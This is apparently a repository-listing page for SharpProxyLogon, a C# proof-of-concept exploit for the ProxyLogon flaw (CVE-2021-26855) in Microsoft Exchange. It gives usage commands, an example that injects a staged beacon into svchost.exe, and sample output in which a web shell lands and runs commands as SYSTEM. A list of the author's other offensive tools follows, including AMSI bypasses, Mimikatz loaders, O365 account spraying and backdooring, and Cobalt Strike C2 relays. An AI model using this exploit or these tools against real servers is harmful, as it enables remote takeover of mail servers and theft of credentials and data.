Flangvik/SharpProxyLogon Flangvik/SharpProxyLogon

  • Stars
    star
    226
  • Rank 176,514 (Top 4 %)
  • Language
    C#
  • Created over 3 years ago
  • Updated over 1 year ago
Twitter logo Share LinkedIn logo Share Facebook logo Share
Flangvik/SharpProxyLogon
github

Flangvik

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode injection

SharpProxyLogon

C# POC for the ProxyLogon chained RCE

 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>

Shellcode injection uses built-in TikiTorch stub by @Rastamouse, this will spawn, suspend and inject staged_beacon.bin into svchost.exe

SharpProxyLogon.exe 192.168.58.111:443 [email protected] C:\Temp\staged_beacon.bin "C:\Windows\System32\svchost.exe"

 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>
[+] Got hostname DC01
[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator
[+] Got mailBoxId [email protected]
[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500
[+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500
[+] Got msExchEcpCanary lR_xIbkU4EeRa8k0G_ekSjy7CrzM9dgIeCdYK8sMbRQMUoAQMnEfYvHrvDLT1j2jJMFBrpxnJ1s.
[+] Got aspNETSessionID 0e8da60d-ff97-4748-80f1-5834caeba361
[+] Got OABId 1d2e2d98-c636-43c7-a3a9-8041b545d575
[+] Setting ExternalUrl...
[+] Triggering ResetOABVirtualDirectory...
[+] Shell should have landed, triggering injection

Example with classic webshell drop

SharpProxyLogon.exe 192.168.58.111:443 [email protected]

 __ _                        ___                       __
/ _\ |__   __ _ _ __ _ __   / _ \_ __ _____  ___   _  / /  ___   __ _  ___  _ __
\ \| '_ \ / _` | '__| '_ \ / /_)/ '__/ _ \ \/ / | | |/ /  / _ \ / _` |/ _ \| '_ \
_\ \ | | | (_| | |  | |_) / ___/| | | (_) >  <| |_| / /__| (_) | (_| | (_) | | | |
\__/_| |_|\__,_|_|  | .__/\/    |_|  \___/_/\_\\__, \____/\___/ \__, |\___/|_| |_|
                    |_|                        |___/            |___/
@Flangvik

Usage Shell: SharpProxyLogon.exe <targetip> <targetemail>
Usage x64 injection: SharpProxyLogon.exe <targetip> <targetemail> <shellcodepath.bin> <inject-target-full-path>
[+] Got hostname DC01
[+] Got legacyDN /o=LEGITCORP/ou=Exchange Administrative Group (FYDIBOHF23SPDLT)/cn=Recipients/cn=ae2513b106f343ab8c465ec254b105c6-Administrator
[+] Got mailBoxId [email protected]
[+] Got accountSID S-1-5-21-2354578447-2549489838-160590685-500
[+] Patched accountSID-> S-1-5-21-2354578447-2549489838-160590685-500
[+] Got msExchEcpCanary V7mF62VZA0ay793xWTSE07chwKLM9dgIQolVMbEnWJJkvonIUO8VWm2BZdIklFP35W-mtZnUZ4Y.
[+] Got aspNETSessionID 9028e0b3-e56c-4b33-b0e9-b66ab9ab9067
[+] Got OABId cabf9619-178d-4d3e-84a3-748ec598a477
[+] Setting ExternalUrl...
[+] Triggering ResetOABVirtualDirectory...
[+] Shell should have landed, going semi-interactive
CMD #>whoami
nt authority\system

CMD #>hostname
DC01

CMD #>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::2598:cc98:d369:b6ed%13
   IPv4 Address. . . . . . . . . . . : 192.168.58.111
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.58.2

CMD #>

More Repositories

1

SharpCollection

Nightly builds of common C# offensive tools, fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.
1,767
star
2

BetterSafetyKatz

Fork of SafetyKatz that dynamically fetches the latest pre-compiled release of Mimikatz directly from gentilkiwi GitHub repo, runtime patches signatures and uses SharpSploit DInvoke to PE-Load into memory.
C#
788
star
3

TeamFiltration

TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts
C#
764
star
4

NetLoader

Loads any C# binary in mem, patching AMSI + ETW.
C#
656
star
5

SharpDllProxy

Retrieves exported functions from a legitimate DLL and generates a proxy DLL source code/template for DLL proxy loading or sideloading
C#
523
star
6

AMSI.fail

C# Azure Function with an HTTP trigger that generates obfuscated PowerShell snippets that break or disable AMSI for the current process.
C#
309
star
7

CobaltBus

Cobalt Strike External C2 Integration With Azure Servicebus, C2 traffic via Azure Servicebus
C#
208
star
8

AzureC2Relay

AzureC2Relay is an Azure Function that validates and relays Cobalt Strike beacon traffic by verifying the incoming requests based on a Cobalt Strike Malleable C2 profile.
C#
195
star
9

DeployPrinterNightmare

C# tool for installing a shared network printer abusing the PrinterNightmare bug to allow other network machines easy privesc!
C#
177
star
10

RosFuscator

YouTube/Livestream project for obfuscating C# source code using Roslyn
C#
119
star
11

SharpExfiltrate

Modular C# framework to exfiltrate loot over secure and trusted channels.
C#
114
star
12

ObfuscatedSharpCollection

Attempt at Obfuscated version of SharpCollection
103
star
13

SharpAppLocker

C# port of the Get-AppLockerPolicy PS cmdlet
C#
97
star
14

DLLSideloader

PowerShell script to generate "proxy" counterparts to easily perform DLL Sideloading
C++
93
star
15

UAC-D-E-Rubber-Ducky

Python2 / BASH / VBS- UAC D&E Rubber Ducky
Python
59
star
16

HIDAAF

Python - Human Interface Device Android Attack Framework
Python
36
star
17

HTB-HDBadgeGenerator

HackTheBox High Definition Badge Generator
Python
21
star
18

collector

Utility to analyse, ingest and push out credentials from common data sources during an internal penetration test.
Python
18
star
19

CobaltStuff

12
star
20

AntminerController

C# - Allows for easy changing of pools across multiple miners.
C#
4
star
21

MimiFud

3
star
22

BlackBox-0.1

The baddest box on the frequency
2
star
23

QRucible

Suprise at x33fcon
2
star
24

ProCheat

Cheating on Pro E-Sport LAN events made easy
Visual Basic
1
star
25

StreamStuff

Contains stuff made during streams
C#
1
star